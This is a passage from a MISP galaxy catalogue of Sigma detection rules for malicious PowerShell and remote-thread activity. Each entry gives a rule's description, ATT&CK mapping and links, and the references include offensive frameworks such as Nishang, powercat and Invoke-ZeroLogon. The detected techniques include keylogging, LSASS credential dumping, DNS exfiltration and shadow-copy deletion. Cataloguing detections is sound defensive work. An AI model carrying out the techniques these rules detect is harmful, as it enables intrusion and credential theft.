The tag is: misp-galaxy:sigma-rules="PowerShell Deleted Mounted Share"

PowerShell Deleted Mounted Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

Table 9771. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml

Suspicious TCP Tunnel Via PowerShell Script

Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity

The tag is: misp-galaxy:sigma-rules="Suspicious TCP Tunnel Via PowerShell Script"

Suspicious TCP Tunnel Via PowerShell Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 9772. Table References

Links

https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml

PowerShell ShellCode

Detects Base64 encoded Shellcode

The tag is: misp-galaxy:sigma-rules="PowerShell ShellCode"

PowerShell ShellCode has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9773. Table References

Links

https://twitter.com/cyb3rops/status/1063072865992523776

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml

Suspicious Get Local Groups Information - PowerShell

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

The tag is: misp-galaxy:sigma-rules="Suspicious Get Local Groups Information - PowerShell"

Suspicious Get Local Groups Information - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9774. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml

Zip A Folder With PowerShell For Staging In Temp - PowerShell Script

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Zip A Folder With PowerShell For Staging In Temp - PowerShell Script"

Zip A Folder With PowerShell For Staging In Temp - PowerShell Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 9775. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml

Potential Keylogger Activity

Detects PowerShell scripts that contains reference to keystroke capturing functions

The tag is: misp-galaxy:sigma-rules="Potential Keylogger Activity"

Potential Keylogger Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 9776. Table References

Links

https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content

https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0

https://twitter.com/ScumBots/status/1610626724257046529

https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml

Suspicious Process Discovery With Get-Process

Get the processes that are running on the local computer.

The tag is: misp-galaxy:sigma-rules="Suspicious Process Discovery With Get-Process"

Suspicious Process Discovery With Get-Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 9777. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml

Clear PowerShell History - PowerShell

Detects keywords that could indicate clearing PowerShell history

The tag is: misp-galaxy:sigma-rules="Clear PowerShell History - PowerShell"

Clear PowerShell History - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 9778. Table References

Links

https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml

Active Directory Group Enumeration With Get-AdGroup

Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory

The tag is: misp-galaxy:sigma-rules="Active Directory Group Enumeration With Get-AdGroup"

Active Directory Group Enumeration With Get-AdGroup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 9779. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml

Potential COM Objects Download Cradles Usage - PS Script

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

The tag is: misp-galaxy:sigma-rules="Potential COM Objects Download Cradles Usage - PS Script"

Potential COM Objects Download Cradles Usage - PS Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9780. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57

https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml

Malicious PowerShell Commandlets - ScriptBlock

Detects Commandlet names from well-known PowerShell exploitation frameworks

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Commandlets - ScriptBlock"

Malicious PowerShell Commandlets - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9781. Table References

Links

https://github.com/adrecon/AzureADRecon

https://github.com/besimorhino/powercat

https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html

https://github.com/DarkCoderSc/PowerRunAsSystem/

https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1

https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries

https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1

https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1

https://github.com/calebstewart/CVE-2021-1675

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1

https://github.com/samratashok/nishang

https://github.com/Kevin-Robertson/Powermad

https://github.com/HarmJ0y/DAMP

https://github.com/adrecon/ADRecon

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell

Detects Obfuscated Powershell via VAR++ LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell"

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9782. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml

Clearing Windows Console History

Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

The tag is: misp-galaxy:sigma-rules="Clearing Windows Console History"

Clearing Windows Console History has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 9783. Table References

Links

https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/

https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics

https://www.shellhacks.com/clear-history-powershell/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml

HackTool - Rubeus Execution - ScriptBlock

Detects the execution of the hacktool Rubeus using specific command line flags

The tag is: misp-galaxy:sigma-rules="HackTool - Rubeus Execution - ScriptBlock"

HackTool - Rubeus Execution - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"

Table 9784. Table References

Links

https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html

https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus

https://github.com/GhostPack/Rubeus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml

Powershell XML Execute Command

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code

The tag is: misp-galaxy:sigma-rules="Powershell XML Execute Command"

Powershell XML Execute Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9785. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml

Suspicious PowerShell Invocations - Specific

Detects suspicious PowerShell invocation command parameters

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocations - Specific"

Suspicious PowerShell Invocations - Specific has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9786. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml

Windows Defender Exclusions Added - PowerShell

Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusions Added - PowerShell"

Windows Defender Exclusions Added - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9787. Table References

Links

https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml

Suspicious X509Enrollment - Ps Script

Detect use of X509Enrollment

The tag is: misp-galaxy:sigma-rules="Suspicious X509Enrollment - Ps Script"

Suspicious X509Enrollment - Ps Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 9788. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42

https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml

Malicious Nishang PowerShell Commandlets

Detects Commandlet names and arguments from the Nishang exploitation framework

The tag is: misp-galaxy:sigma-rules="Malicious Nishang PowerShell Commandlets"

Malicious Nishang PowerShell Commandlets has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9789. Table References

Links

https://github.com/samratashok/nishang

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml

Suspicious GetTypeFromCLSID ShellExecute

Detects suspicious Powershell code that execute COM Objects

The tag is: misp-galaxy:sigma-rules="Suspicious GetTypeFromCLSID ShellExecute"

Suspicious GetTypeFromCLSID ShellExecute has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9790. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml

WMImplant Hack Tool

Detects parameters used by WMImplant

The tag is: misp-galaxy:sigma-rules="WMImplant Hack Tool"

WMImplant Hack Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9791. Table References

Links

https://github.com/FortyNorthSecurity/WMImplant

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml

Registry-Free Process Scope COR_PROFILER

Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)

The tag is: misp-galaxy:sigma-rules="Registry-Free Process Scope COR_PROFILER"

Registry-Free Process Scope COR_PROFILER has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012" with estimative-language:likelihood-probability="almost-certain"

Table 9792. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml

Powershell DNSExfiltration

DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel

The tag is: misp-galaxy:sigma-rules="Powershell DNSExfiltration"

Powershell DNSExfiltration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 9793. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh

https://github.com/Arno0x/DNSExfiltrator

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml

Invoke-Obfuscation Via Use MSHTA - PowerShell

Detects Obfuscated Powershell via use MSHTA in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use MSHTA - PowerShell"

Invoke-Obfuscation Via Use MSHTA - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9794. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml

Potential Persistence Via Security Descriptors - ScriptBlock

Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Security Descriptors - ScriptBlock"

Table 9795. Table References

Links

https://github.com/HarmJ0y/DAMP

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml

Powershell WMI Persistence

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.

The tag is: misp-galaxy:sigma-rules="Powershell WMI Persistence"

Powershell WMI Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9796. Table References

Links

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml

Code Executed Via Office Add-in XLL File

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs

The tag is: misp-galaxy:sigma-rules="Code Executed Via Office Add-in XLL File"

Code Executed Via Office Add-in XLL File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006" with estimative-language:likelihood-probability="almost-certain"

Table 9797. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml

Powershell Directory Enumeration

Detects technique used by MAZE ransomware to enumerate directories using Powershell

The tag is: misp-galaxy:sigma-rules="Powershell Directory Enumeration"

Powershell Directory Enumeration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 9798. Table References

Links

https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml

Automated Collection Bookmarks Using Get-ChildItem PowerShell

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

The tag is: misp-galaxy:sigma-rules="Automated Collection Bookmarks Using Get-ChildItem PowerShell"

Automated Collection Bookmarks Using Get-ChildItem PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Information Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

Table 9799. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml

Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

The tag is: misp-galaxy:sigma-rules="Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script"

Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9800. Table References

Links

https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml

Invoke-Obfuscation CLIP+ Launcher - PowerShell

Detects Obfuscated use of Clip.exe to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation CLIP+ Launcher - PowerShell"

Invoke-Obfuscation CLIP+ Launcher - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9801. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml

PowerShell Get-Process LSASS in ScriptBlock

Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity

The tag is: misp-galaxy:sigma-rules="PowerShell Get-Process LSASS in ScriptBlock"

PowerShell Get-Process LSASS in ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9802. Table References

Links

https://twitter.com/PythonResponder/status/1385064506049630211

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml

Suspicious IO.FileStream

Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.

The tag is: misp-galaxy:sigma-rules="Suspicious IO.FileStream"

Suspicious IO.FileStream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 9803. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml

Invoke-Obfuscation Via Stdin - Powershell

Detects Obfuscated Powershell via Stdin in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Stdin - Powershell"

Invoke-Obfuscation Via Stdin - Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9804. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml

Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript"

Table 9805. Table References

Links

https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml

PowerShell Script With File Upload Capabilities

Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method.

The tag is: misp-galaxy:sigma-rules="PowerShell Script With File Upload Capabilities"

PowerShell Script With File Upload Capabilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 9806. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md

https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml

Root Certificate Installed - PowerShell

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

The tag is: misp-galaxy:sigma-rules="Root Certificate Installed - PowerShell"

Root Certificate Installed - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 9807. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml

Potential Defense Evasion Via Raw Disk Access By Uncommon Tools

Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts

The tag is: misp-galaxy:sigma-rules="Potential Defense Evasion Via Raw Disk Access By Uncommon Tools"

Potential Defense Evasion Via Raw Disk Access By Uncommon Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Direct Volume Access - T1006" with estimative-language:likelihood-probability="almost-certain"

Table 9808. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml

Password Dumper Remote Thread in LSASS

Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.

The tag is: misp-galaxy:sigma-rules="Password Dumper Remote Thread in LSASS"

Password Dumper Remote Thread in LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9809. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_password_dumper_lsass.yml

Rare Remote Thread Creation By Uncommon Source Image

Detects uncommon processes creating remote threads.

The tag is: misp-galaxy:sigma-rules="Rare Remote Thread Creation By Uncommon Source Image"

Rare Remote Thread Creation By Uncommon Source Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 9810. Table References

Links

https://lolbas-project.github.io

Personal research, statistical analysis[Personal research, statistical analysis]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml

Remote Thread Creation In Mstsc.Exe From Suspicious Location

